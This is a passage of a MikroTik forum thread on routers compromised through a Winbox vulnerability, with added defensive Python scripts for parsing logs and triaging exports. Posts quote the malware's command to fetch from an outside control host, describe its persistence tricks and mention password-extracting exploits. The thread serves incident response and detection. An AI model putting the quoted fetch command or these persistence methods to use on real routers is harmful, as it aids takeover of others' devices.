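SAMPLE_LOG = """\
jul/06 21:10:09 system,info verified routeros-arm-6.42.5.npk
jul/06 21:10:09 system,info installed routeros-arm-6.42.5
jul/16 12:00:50 system,info,account user admin logged in from 194.40.240.254 via winbox
jul/16 12:00:53 system,info,account user admin logged in from 194.40.240.254 via telnet
jul/16 12:00:54 system,info socks config changed by admin
jul/16 12:00:55 system,info filter rule added by admin
jul/16 12:00:55 system,info filter rule moved by admin
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via winbox
jul/16 12:00:56 system,info,account user admin logged out from 194.40.240.254 via telnet
jul/20 09:12:01 system,info,account user admin logged in from 192.0.2.10 via winbox
jul/20 09:14:30 system,info filter rule added by admin
jul/20 09:20:02 system,info,account user admin logged out from 192.0.2.10 via winbox
jul/24 21:58:07 system,info,account user admin logged in from 185.153.198.228 via winbox
jul/24 21:58:10 system,info,account user admin logged in from 185.153.198.228 via telnet
jul/24 21:58:11 system,info user service added by admin
jul/24 21:58:11 system,info filter rule removed by admin
jul/24 21:58:12 system,info socks config changed by admin
jul/24 21:58:13 system,info filter rule added by admin
jul/24 21:58:13 system,info filter rule moved by admin
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via winbox
jul/24 21:58:14 system,info,account user admin logged out from 185.153.198.228 via telnet
"""

if __name__ == "__main__":
    for f in flag_sessions(parse_sessions(SAMPLE_LOG), ["192.0.2.0/24"]):
        tag = "scripted" if f["scripted"] else "interactive"
        print(f"{f['start']} {f['user']}@{f['ip']} ({tag}): {', '.join(f['sensitive'])}")
```

Note that the memory log only holds what the attacker left behind: one of the reported changes is `memory-lines=1`, so on a fully worked-over router this log is empty and the export scan is the only on-box evidence left. A remote syslog target that the router cannot reconfigure from its own scripts removes that dependency.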
 
tippenring
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 1:12 am


When they updated they didn't change the password.
No, the attacker didn't change the password. If he did, that would give away that the router had been compromised. The attacker didn't want you to know he had the admin password for the router. So, you upgraded software, but did not change the password that the attacker obtained when you were running the vulnerable version.
 
gotsprings
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 1:38 am

Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 5:36 am

I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware version 30RC9 on 2 Aug. This spyware locks my "admin" account to read-only, creates a "sys" account with full read/write policy and also locks the allowed login address to 127.0.0.1 only. The script also changes the reformat-hold-button and reformat-hold-button-max times every second.
I used the exploit, which can get the "sys" password, but I don't know how to log in to the router and reset it to the factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
 
tippenring
Member Candidate
Posts: 150
Joined: Thu Oct 02, 2014 8:54 pm
Location: St Louis MO

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 7:12 am

Tippenring.

I was agreeing with you. The logs were proof that 2 different attackers had the password from before the upgrade.
I misunderstood your post. My apologies.
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:08 am

I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware, version 30RC9, on 2 Aug. This spyware locked my "admin" account to read-only, created a "sys" account with full read/write policy, and also locked the allowed login address to 127.0.0.1 only. The script also changes the reformat-hold-button and reformat-hold-button-max settings every second.
I used the exploit which can get the "sys" password, but I don't know how to log in to the router and reset it to factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
No answer to your question? How to write posts
 
grusu
Frequent Visitor
Frequent Visitor
Posts: 80
Joined: Tue Aug 13, 2013 7:35 am
Location: Bucharest, Romania

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:22 am

As far as I can see in the first picture, the sys user can log in only from IP 127.0.0.1, so you can only try from the serial port.
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:26 am

I have one remote router (CCR1009 v6.40.7) which was infected with the "sys" virus/spyware, version 30RC9, on 2 Aug. This spyware locked my "admin" account to read-only, created a "sys" account with full read/write policy, and also locked the allowed login address to 127.0.0.1 only. The script also changes the reformat-hold-button and reformat-hold-button-max settings every second.
I used the exploit which can get the "sys" password, but I don't know how to log in to the router and reset it to factory configuration. Can I use the serial port for console login, or do I need to reset the NAND chip?
https://ibb.co/gsfc0e
https://ibb.co/nHDKwK
https://ibb.co/d0RuVe
https://ibb.co/b44RbK
https://ibb.co/cww03z
1) Wait, so you have the "sys" password? What is it? I think it will be useful for others to find out too.
2) Just log in with Winbox username "sys" and the password that you found. What is the question?
1. I have tried to read this topic viewtopic.php?f=2&t=131166&p=646273&hil ... ys#p646273 but without success because of the newer spyware version. I just googled on the internet and there are exploits which can use the MikroTik vulnerability to get the MikroTik password easily (python + script + destination IP). So I now understand why this bug could spread so fast to the many MikroTik routers which were not patched to a safe baseline version (including me 555).
https://ibb.co/jh2Siz

2. I have tried to log in to the remote MikroTik with that password but without success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable the hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another site.)
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:29 am

The title of this thread is somewhat misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not RouterOS.
It does not help to upgrade Winbox :)
 
User avatar
normis
MikroTik Support
MikroTik Support
Topic Author
Posts: 23509
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:42 am

The title of this thread is somewhat misleading:
Winbox vulnerability: please upgrade
It looks like Winbox is the problem, not RouterOS.
It does not help to upgrade Winbox :)
This is why sometimes reading is important. Quote:
vulnerability in the RouterOS Winbox service, that was patched in RouterOS
Steps to be taken: Upgrade RouterOS to the latest release
Is it really so hard to read more than the first 4 words?
No answer to your question? How to write posts
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 9:46 am

- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you set up the default NAT, it looks like all service ports are blocked from the outside.
Do I still need to specify where Winbox should be allowed from?
/ip service set winbox address=192.168.88.0/24
I only have two users on the net, me and my wife :)

Also, when I secure the http and winbox services by IP, I cannot see any log entry from RouterOS when someone not in that IP range tries to log in. This should be logged, as I can do with a normal firewall/NAT/mangle rule. I would then be able to see if my security upgrade actually helps me!!
 
gotsprings
Long time Member
Long time Member
Posts: 571
Joined: Mon May 14, 2012 9:30 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 4:48 pm

- Implement a good firewall according to the article here: https://wiki.mikrotik.com/wiki/Manual:S ... our_Router
When you set up the default NAT, it looks like all service ports are blocked from the outside.
Do I still need to specify where Winbox should be allowed from?
/ip service set winbox address=192.168.88.0/24
I only have two users on the net, me and my wife :)

Also, when I secure the http and winbox services by IP, I cannot see any log entry from RouterOS when someone not in that IP range tries to log in. This should be logged, as I can do with a normal firewall/NAT/mangle rule. I would then be able to see if my security upgrade actually helps me!!
Add this to your firewall.

/ip firewall filter add chain=input src-address=!192.168.88.0/24 protocol=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and a log entry.
"It ain't what you don't know that gets you into trouble. It's what you know for sure that just ain't so."
Mark Twain
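The passthrough rule above answers Jotne's question by writing one log line per outside connection attempt on the Winbox port. As an added example (not code from the forum or from MikroTik), the script below reads such RouterOS firewall log lines, counts probes per source address, and flags any hit whose source lies inside the range that the rule's src-address negation is supposed to exclude, which would mean the rule or its placement is not doing what was intended. The log layout follows the usual RouterOS firewall format, but the sample lines are constructed, not captured from a router.

```python
"""Summarise RouterOS log lines written by a firewall rule that uses
log-prefix="Winbox External Probe". Added example, not from the forum or
from MikroTik. The layout follows RouterOS firewall log lines, but the
sample below is constructed, not captured from a real device."""
import ipaddress
import re
from collections import Counter

# Constructed sample log. The fourth line is deliberately from the allowed
# LAN range to exercise the misfire check; the last line is unrelated noise.
SAMPLE_LOG = """\
aug/07 16:50:01 firewall,info Winbox External Probe input: in:ether1 out:(unknown 0), src-mac 00:11:22:33:44:55, proto TCP (SYN), 203.0.113.5:51234->198.51.100.1:8291, len 60
aug/07 16:50:02 firewall,info Winbox External Probe input: in:ether1 out:(unknown 0), src-mac 00:11:22:33:44:55, proto TCP (SYN), 203.0.113.5:51235->198.51.100.1:8291, len 60
aug/07 16:50:09 firewall,info Winbox External Probe input: in:ether1 out:(unknown 0), src-mac 00:11:22:33:44:55, proto TCP (SYN), 198.51.100.77:40000->198.51.100.1:8291, len 60
aug/07 16:51:30 firewall,info Winbox External Probe input: in:bridge out:(unknown 0), src-mac 66:77:88:99:aa:bb, proto TCP (SYN), 192.168.88.10:50001->192.168.88.1:8291, len 60
aug/07 16:51:31 system,info user admin logged in from 192.168.88.10 via winbox
"""

# timestamp, topics, log prefix, chain, in-interface, protocol, src:port->dst:port
LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) firewall,info (?P<prefix>.+?) (?P<chain>\w+): in:(?P<iface>\S+) "
    r".*?proto (?P<proto>\w+).*?, "
    r"(?P<src>[\d.]+):(?P<sport>\d+)->(?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_probe_line(line, prefix="Winbox External Probe"):
    """Return the fields of one matching firewall log line, or None."""
    m = LINE_RE.match(line)
    if not m or m.group("prefix") != prefix:
        return None
    return {
        "ts": m.group("ts"), "iface": m.group("iface"), "proto": m.group("proto"),
        "src": m.group("src"), "dst": m.group("dst"), "dport": int(m.group("dport")),
    }


def summarise(log_text, allowed="192.168.88.0/24"):
    """Count probes per source and collect hits from inside the allowed range.
    Such hits should never occur if src-address=!<allowed> is in effect."""
    allowed_net = ipaddress.ip_network(allowed)
    per_source = Counter()
    misfires = []
    for line in log_text.splitlines():
        hit = parse_probe_line(line)
        if hit is None:
            continue
        per_source[hit["src"]] += 1
        if ipaddress.ip_address(hit["src"]) in allowed_net:
            misfires.append(hit)
    return per_source, misfires


def report(log_text, allowed="192.168.88.0/24"):
    """Human-readable summary, busiest sources first, misfires last."""
    per_source, misfires = summarise(log_text, allowed)
    lines = [f"{src}: {n} probe(s)" for src, n in per_source.most_common()]
    for hit in misfires:
        lines.append(f"WARNING: hit from allowed range {hit['src']} "
                     f"on {hit['iface']} at {hit['ts']}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_LOG)))
```

Feed it the output of `/log print` filtered on the prefix, or a syslog export of the same lines; the `allowed` argument must match the network used in the rule's src-address negation.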
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 8:06 pm

2. I have tried to log in to the remote MikroTik with that password but without success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable the hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another site.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
 
User avatar
Jotne
Member
Member
Posts: 473
Joined: Sat Dec 24, 2016 11:17 am

Re: Winbox vulnerability: please upgrade

Tue Aug 07, 2018 10:12 pm


/ip firewall filter add chain=input src-address=!192.168.88.0/24 protocol=tcp dst-port=8291 action=passthrough log=yes log-prefix="Winbox External Probe" place-before=1

That would give you a counter and a log entry.
Thanks, did not think of that :)
 
aswin
just joined
Posts: 5
Joined: Tue Jul 11, 2017 6:26 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:11 am

2. I have tried to log in to the remote MikroTik with that password but without success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable the hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another site.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Thank you kobuki for your suggestion. Perfect!! Now I can remotely log in to the infected router with user "sys" via SOCKS.
Thank you again. It saves me a lot of time instead of asking the client to send the router back to me.
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:17 am

Now I can remotely log in to the infected router with user "sys" via SOCKS.
Good! Thanks for the feedback. Your attacker was a particularly malicious one, almost locking you out completely. Almost.
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:41 am

That's it! THX!

In the scripts there is
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
I grabbed the PHP file before fixing my router. I opened it with notepad and it was completely blank......
Interesting, thanks. I wonder then if the empty file is just a byproduct of the fetch command, and the point is to execute the PHP file on that web server rather than download it. Perhaps it's part of the command and control system, and by calling this file the router is checking in. Certainly such a call would provide a loggable IP address.
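Between aswin's description earlier in the thread (a full-rights "sys" user, admin downgraded to read-only, logins pinned to 127.0.0.1, the reformat-hold-button timers being rewritten, SOCKS left enabled) and the scheduled fetch quoted just above, the thread lists enough indicators to triage an `/export` taken from a suspect router. The script below, added here and not code from the forum or from MikroTik, does that triage over a constructed export. The export text is built to resemble a real non-verbose export (so only non-default values appear); the fetch host, port and path are the ones quoted in the thread, and the menu paths and key names are what RouterOS uses, but the specific user, script and scheduler names are made up.

```python
"""Triage a RouterOS `/export` for the compromise indicators described in this
thread. Added example, not from the forum or from MikroTik. The export text
below is constructed to resemble a real non-verbose export (only changed values
are listed); the fetch host/port/path are those quoted in the thread."""
import ipaddress
import re

# Constructed sample export showing every indicator the thread mentions.
SAMPLE_EXPORT = """\
# aug/08/2018 02:00:00 by RouterOS 6.40.7
/user
add name=sys group=full address=127.0.0.1
set [ find name=admin ] group=read
/system routerboard settings
set reformat-hold-button=10s reformat-hold-button-max=10s
/system script
add name=upd source="/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http"
/system scheduler
add name=upd-sched interval=1s on-event=upd
/ip socks
set enabled=yes port=4145
"""

# Constructed clean export: admin keeps full rights, SOCKS is off.
CLEAN_EXPORT = """\
/user
set [ find name=admin ] group=full
/ip socks
set enabled=no
"""

# key=value pairs; a quoted value (e.g. a script source) is taken whole.
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Return [(menu, verb, {key: value}), ...] for each add/set line."""
    items, menu = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):
            menu = line          # e.g. "/user" or "/system script"
            continue
        verb = line.split(" ", 1)[0]
        # For "set [ find name=admin ] ..." the name=admin inside the
        # brackets is picked up as the target user's name.
        kv = {k: v.strip('"') for k, v in KV_RE.findall(line)}
        items.append((menu, verb, kv))
    return items


def is_external(host):
    """True for a public IP; hostnames cannot be judged offline, so flag them."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return True


def triage(text):
    """Return human-readable findings; an empty list means nothing matched."""
    findings = []
    for menu, verb, kv in parse_export(text):
        if menu == "/user":
            name = kv.get("name", "?")
            if kv.get("group") == "full" and name != "admin":
                findings.append(f"user {name!r} has full rights")
            if name == "admin" and kv.get("group") == "read":
                findings.append("admin downgraded to read-only")
            if kv.get("address", "").startswith("127."):
                findings.append(f"user {name!r} may only log in from {kv['address']}")
        elif menu == "/system routerboard settings":
            # Present in a non-verbose export only if changed from default.
            for key in ("reformat-hold-button", "reformat-hold-button-max"):
                if key in kv:
                    findings.append(f"{key}={kv[key]} (reset-button timing changed)")
        elif menu == "/system script":
            m = re.search(r"/tool fetch\b.*?\baddress=(\S+)", kv.get("source", ""))
            if m and is_external(m.group(1)):
                findings.append(f"script {kv.get('name')!r} fetches from external host {m.group(1)}")
        elif menu == "/system scheduler":
            iv = kv.get("interval", "")
            if re.fullmatch(r"\d+s", iv) and int(iv[:-1]) <= 60:
                findings.append(f"scheduler {kv.get('name')!r} runs {kv.get('on-event')!r} every {iv}")
        elif menu == "/ip socks" and kv.get("enabled") == "yes":
            findings.append(f"SOCKS proxy enabled on port {kv.get('port', '1080')}")
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EXPORT):
        print("-", finding)
```

Run it against `/export` output saved from the suspect device; an empty result only means none of these particular indicators matched, so the upgrade and password change still apply regardless.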
 
kobuki
Member Candidate
Member Candidate
Posts: 123
Joined: Sat Apr 02, 2011 5:59 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:44 am

It was empty where I checked, too. It's possibly just a presence indicator in the swarm for the C&C, as you also mentioned...
 
excession
just joined
Posts: 17
Joined: Mon May 11, 2015 8:16 pm

Re: Winbox vulnerability: please upgrade

Wed Aug 08, 2018 2:45 am

2. I have tried to log in to the remote MikroTik with that password but without success, so I think the problem comes from the hacker allowing only IP 127.0.0.1 to log in with the "sys" account.
And the hacker used a script to disable the hard reset, so I am just asking whether I can use the serial cable to log in. (The infected router is still located at another site.)
If you haven't figured it out yet, you could try connecting to 127.0.0.1 on your router using the socks service which has probably been enabled on your device by the attacker. That assumes you've already hacked the 'sys' user's password.
Smart idea. Is he trying to use Winbox to connect, and if so, how would you route a Winbox connection through a SOCKS proxy?
